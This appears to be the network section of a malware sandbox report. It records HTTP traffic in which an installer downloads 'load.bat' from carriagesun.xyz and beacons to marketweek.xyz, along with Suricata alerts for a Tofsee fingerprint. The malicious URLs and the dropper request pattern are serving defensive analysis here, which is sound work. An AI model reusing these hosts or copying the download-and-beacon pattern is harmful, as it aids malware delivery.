Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| carriagesun.xyz | 172.67.188.99 | |
| marketweek.xyz | 172.67.211.92 |
HEAD
200
https://carriagesun.xyz/pe/start/index.php?a=2910&p=4134&t=50784292
REQUEST
RESPONSE
BODY
HEAD /pe/start/index.php?a=2910&p=4134&t=50784292 HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: carriagesun.xyz
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 02:23:44 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/7.2.7
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbeLwOIVNvk9v6ZMSD%2BbBaraPmLaFIobXJVcxW1L0y9mUCU2AWWtpMfbWSMQXDwGgRTA06FK2DBviIHbGkGapz1Qq4cjF%2B6qJ114MGwFdPrl5isWeGcCPZv7i3m6EmqF4aM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd1b62aa8457d10-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://carriagesun.xyz/pe/start/index.php?a=2910&p=4134&t=50784292
REQUEST
RESPONSE
BODY
GET /pe/start/index.php?a=2910&p=4134&t=50784292 HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: carriagesun.xyz
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 02:23:44 GMT
Content-Type: application/octet-stream
Content-Length: 13685
Connection: keep-alive
X-Powered-By: PHP/7.2.7
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FE%2B1eqjLH6pZ5mM8mjHJPp6L3JqB8yrsf9e2LTKoiNOTdBvtSnIEjCvP2WbCMSkWlC0yTVX1EHrBox2GuppqrMG%2ByJqL4WRbJQ4x02PNDeFARFh2OVwtXZ5RV2NLtHIQE1o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd1b62d0ad97d10-LAX
GET
200
https://marketweek.xyz/endroipe?tid=50784292&pid=4134&a=2910&cc=KR&t=1728008627
REQUEST
RESPONSE
BODY
GET /endroipe?tid=50784292&pid=4134&a=2910&cc=KR&t=1728008627 HTTP/1.1
Host: marketweek.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 02:24:08 GMT
Content-Type: text/plain
Content-Length: 2
Connection: keep-alive
X-Powered-By: PHP/5.5.38
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZY2fyzOU4waWLIMiZETmLtt4XJ2ckUhehM2G4SXi29Wk1Azpr%2BvquWZ%2BQ1RT9stgZj%2BCpn%2BTglpMuWsE8mLgdrk00Zlek7YcSZ6navmrQs8%2FBq2QA7lH6WX7eD43m%2BDhg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd1b6c55aee2b85-LAX
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49176 -> 172.67.211.92:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.103:49164 -> 172.67.188.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49176 172.67.211.92:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=marketweek.xyz | 30:7f:b7:8c:f9:69:12:0f:96:f2:5e:4e:bd:40:11:2d:ee:25:0c:c5 |
|
TLSv1 192.168.56.103:49164 172.67.188.99:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=carriagesun.xyz | 0c:53:11:1c:34:df:ab:25:76:d8:db:8d:49:a0:c3:d9:61:87:88:c6 |
Snort Alerts
No Snort Alerts